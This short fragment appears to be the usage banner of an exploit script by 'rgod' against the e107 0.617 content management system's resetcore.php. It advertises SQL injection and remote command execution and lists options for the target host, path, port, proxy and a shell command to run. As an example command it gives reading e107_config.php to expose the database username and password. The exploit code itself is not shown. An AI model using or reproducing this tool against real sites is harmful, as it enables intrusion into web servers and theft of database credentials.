e107 0.617 resetcore.php SQL injection & remote commands execution
a script byrgod at http://rgod.altervista.org
hostname (ex: www.sitename.com)
path (ex: /e1 07/ or just /)
specify a port other than 80 (default value)
a shell command, cat ./../../e107_config. php to see database username/password
send exploit through an HTTP proxy (ip:port)